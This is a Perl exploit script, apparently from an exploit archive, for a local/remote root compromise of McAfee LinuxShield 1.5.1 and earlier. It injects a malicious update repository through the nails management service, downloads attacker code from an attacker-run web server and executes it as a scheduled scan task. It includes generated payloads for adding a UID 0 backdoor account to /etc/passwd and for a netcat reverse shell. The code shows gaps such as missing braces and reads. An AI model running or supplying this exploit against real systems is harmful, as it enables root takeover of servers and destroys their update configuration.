McAfee LinuxShield 1.5.1 – Local/Remote File Inclusion / Remote Code Execution

  • 作者: Nikolas Sotiriu
    日期: 2010-08-27
  • 类别:
  • 来源:
  • #!/usr/bin/perl
    #Title: McAfee LinuxShield <= 1.5.1 Local/Remote Root Exploit
    #Author:Nikolas Sotiriu (lofi) <lofi[at]>
    #WARNING: This Exploit deletes the default Update Server
    #Use it only for education or ethical pentesting! The author accepts 
    #no liability for damage caused by this tool.
    use strict;
    use IO::Socket::SSL;
    use Getopt::Std;
    my %args;
    my $ack;
    my $timestamp;
    getopt('h:p:u:v:e:a:g:', \%args);
    my $gen_exec= $args{g};
    if (defined $gen_exec) {
    my $target_host = $args{h} || usage();
    my $target_port = $args{p} || 65443;
    my $nails_user= $args{u} || usage();
    my $nails_pass= $args{v} || "";
    my $exec_path = $args{e} || "/opt/McAfee/cma/scratch/update/catalog.z";
    my $my_host = $args{a} || "";
    my $range = 50000000;
    my $minimum = 90000000;
    my $randomtask = int(rand($range)) + $minimum;
    my $pre="sconf ODS_99 ";
    my $post="\x0d\x0a";
    my $setrepo1='db set 1 _table=repository status=1 siteList=<?xml\ version="1.0"\ encoding="UTF-8"?><ns:SiteLis'.
     'ts\ xmlns:ns="naSiteList"\ GlobalVersion="20030131003110"\ LocalVersion="20091209161903"\ Type="Clie'.
     'nt"><SiteList\ Default="1"\ Name="SomeGUID"><HttpSite\ Type="repository"\ Name="EvilRepo"\ Order="1"'.
     '\ Server="';
    my $setrepo2=':80"\ Enabled="1"\ Local="1"><RelativePath>nai</RelativePath><UseAuth>0</UseAut'.
     'h><UserName></UserName><Password\ Encrypted="0"/></HttpSite></SiteList></ns:SiteLists> _cmd=update';
    my $setsite="task setsitelist";
    my $begin="begin";
    my$set="set ";
    my $profile=" nailsd.profile.ODS_99.allFiles=true nailsd.profile.ODS_99.childInitTmo=60".
     " nailsd.profile.ODS_99.cleanChildren=2 nailsd.profile.ODS_99.cleansPerChild=10000 nailsd.profile.ODS".
     "_5.datPath=/opt/NAI/LinuxShield/engine/dat nailsd.profile.ODS_99.decompArchive=true nailsd.profile.".
     "ODS_99.decompExe=true nailsd.profile.ODS_99.engineLibDir=/opt/NAI/LinuxShield/engine/lib".
     " nailsd.profile.ODS_99.factoryInitT".
     "mo=60 nailsd.profile.ODS_99.heuristicAnalysis=true nailsd.profile.ODS_99.macroAnalysis=true nailsd.p".
     "rofile.ODS_99.maxQueSize=32 nailsd.profile.ODS_99.mime=true nailsd.profile.ODS_99.noJokes=false nails".
     "d.profile.ODS_99.program=true nailsd.profile.ODS_99.quarantineChildren=1 nailsd.profile.ODS_99.quaran".
     "tineDirectory=/quarantine nailsd.profile.ODS_99.quarantinesPerChild=10000 nailsd.profile.ODS_99.scan".
     "Children=2 nailsd.profile.ODS_99.scanMaxTmo=301 nailsd.profile.ODS_99.scanNWFiles=true nailsd.profil".
     "e.ODS_99.scanOnRead=true nailsd.profile.ODS_99.scanOnWrite=true nailsd.profile.ODS_99.scannerPath=".
     " nailsd.profile.ODS_99.scansPerChild=10000".
     "owScanChildren=0 nailsd.profile.ODS_99.filter.0.type=exclude-path nailsd.profile.ODS_99.filter.0.pat".
     "h=/proc nailsd.profile.ODS_99.filter.0.subdir=true nailsd.profile.ODS_99.filter.extensions.mode=all ".
     "nailsd.profile.ODS_99.filter.extensions.type=extension nailsd.profile.ODS_99.action.Default.primary=".
     "Clean nailsd.profile.ODS_99.action.Default.secondary=Quarantine nailsd.profile.ODS_99.action.App.pri".
     "mary=Clean nailsd.profile.ODS_99.action.App.secondary=Quarantine nailsd.profile.ODS_99.action.timeou".
     "t=Pass nailsd.profile.ODS_99.action.error=Block";
    my $commit="commit ";
    my $setdb=" _table=schedule taskName=$randomtask taskType=On-Demand taskInfo=profileName=ODS_99,".
    "paths=path:/root/tmp;exclude:false timetable=type=unscheduled taskResults=0 i_lastRun=1260318482 status=Stopped _cmd=insert";
    	#update _where= i_taskId=2";
    my $execupd="task nstart LinuxShield Update";
    my $execute="task nstart $randomtask";
    if ($exec_path eq "/opt/McAfee/cma/scratch/update/catalog.z") {
    	if ($my_host eq "") {
    sub stOne {
    	my $reposock = IO::Socket::SSL->new(
    PeerAddr => $target_host,
    PeerPort => $target_port,
    Proto=> 'tcp',
    	if (defined $reposock) {
    		print "[*] Executing Stage One\n";
    		print "-----------------------\n";		
    print $ack;
    print $reposock "auth ".$nails_user." ".$nails_pass.$post;
    if ($ack=~m/ERR authentication failure/){
    print "[-] Authentication failed...\n";
    print $ack;
    print "[+] Repo update: inject evil repo\n";
    print $reposock $setrepo1.$my_host.$setrepo2.$post;
    print "[+] Repo Site update: update site task\n";
    print $reposock $setsite.$post;
    print $ack;
    print "[+] Execute AV Update: downloading evil code\n";
    print $reposock $execupd.$post;
    sleep(5);# Update needs a bit time
    sub stTwo {
    my $sock = IO::Socket::SSL->new(
    PeerAddr => $target_host,
    PeerPort => $target_port,
    Proto=> 'tcp',
    	if (defined $sock) {
    print "\n\n[*] Executing Stage TWO\n";
    print "-----------------------\n";
    		print $ack;
    		print $sock "auth ".$nails_user." ".$nails_pass.$post;
    		if ($ack=~m/ERR authentication failure/){
    			print "[-] Authentication failed...\n";
    		print $ack;
    		print $sock $pre.$begin.$post;
    		print $ack;
    			$ack=~s/\+OK //g;
    			$timestamp=~ s/\s+$//;
    			print "[+] Timestamp: $timestamp\n";
    		print "[+] Profile: Injecting evil Profile\n";
    		print $sock $pre.$set.$timestamp.$profile.$post;
    		print "[+] Commit: Profile changes\n";
    		print $sock $pre.$commit.$timestamp.$post;
    		print "[+] Schedule: Injecting evil task $randomtask\n";
    		print $sock "db set ".$timestamp.$setdb.$post;
    		print "[+] Excute: Task $randomtask\n";
    		print $sock $execute.$post;
    		print "[+] Done... Check whatever you did\n";
    	} else {
    	print "[-] some troubles with connection: $!\n" ;
    sub usage {
    print "\n";
    print " - McAfee LinuxShield local/remote Root Exploit\n";
    print "===============================================================\n\n";
    print "Usage:\n";
    print " $0 -h <target ip> -u <user> -v <pass> [-a <my host>|-e <executable>]\n";
    print "Optional:\n";
    print " -a <attacker host with httpd>\n";
    print " -e <executable file on target host>\n";
    print " -p <target port (default: 65443)>\n";
    print " -g (1|2) <generat shell scripts to execute>\n";
    print "1 <UID 0 user add>\n";
    print "2 <reverse nc shell>\n";
    print "Notes:\n";
    print " -We can not handle arguments given to executable\n";
    print "in the -e option.\n";
    print " -To download your own evil executable, start a httpd\n";
    print "and set the -a option. Create the directory <nai> in\n";
    print "your wwwroot and rename your executable to <catalog.z>\n";
    print "Author:\n";
    print " Nikolas Sotiriu (lofi)\n";
    print " url:\n";
    print " mail: lofi[at]\n";
    print "\n";
    sub genEx {
    my ($code)=@_;
    if ($code==1) {
    print STDERR << "EOF";
    ============== UID 0 user add ==============
    Copy this lines to the catalog.z file.
    USER=haxxor PASS=haxxorPass
    -------------- cut -------------- 
    echo haxxor:AzFQk89Xgpp8s:0:0::/:/bin/sh >> /etc/passwd
    -------------- /cut -------------- 
    } elsif ($code==2) {
    print STDERR << "EOF";
    ============== reverse nc shell ==============
    Copy this lines to the catalog.z file.
    -------------- cut --------------
    nc -nv <yourip> 4444 -e /bin/sh
    -------------- /cut --------------
    sub banner {
    	print STDERR << "EOF";
    -------------------------------------------------------------------------------- - McAfee LinuxShield local/remote Root Exploit
     111 1111111
    11100 101 00110111001111
    11101 11 10 111 101 1001111111
    110111 00 10 1111 111 1111111101
     10111 1 10 11 100 101 1 11111111011
    11111 1 10001 01 01 1 1 111 1111011101
    1000 0 11 10 100 10 11 111 11111 11 1111 111100 
    1111111111 01 10 10 11 01 011 11111111111 1 111111
     10111110 001 00 11 1110 11 10 11111111111 11 1111111 111 
    101111111 0 1001 11 1 11 0 10 11 1111111111111111 1111110000111 
    011111 0110 10 100 11 1 11 01 01 111111111111111 1 11110011001
     1011111 0110 10 11 1110 11 1 10 111111111111111111111 100001 
     1011111 0 10 10 01 10 1 11 1 111111111111111111111111 001101 
    011111 000 11 0 1111 0 11 0111111111111111111111111101
     1111111 01 01 1111 1111 1 11 1111111111111111111111 1101 1111
    111 1111 100 111110 0111 0 10111111111111111111111 11111 1111 
     111 11111111 1 1 1111 11 111111111111111111111111101001
    111 1011111 1 11111111110111111111111111111111111111111 01 10111001 
     11 110010110110100011110111111111111111110 111 11100 
    11100101110100101 011111111111111111001 11111101
    110000 1011000011 1011 1111 1111111000 1111111 0
    11 000 1011100001101000 1 1001 0000111101 
    0110111111 1011 01100010111011 10 
    10111 10010000011 1010
     1001111100 1111 101 11 
    1110 01 101011 1001100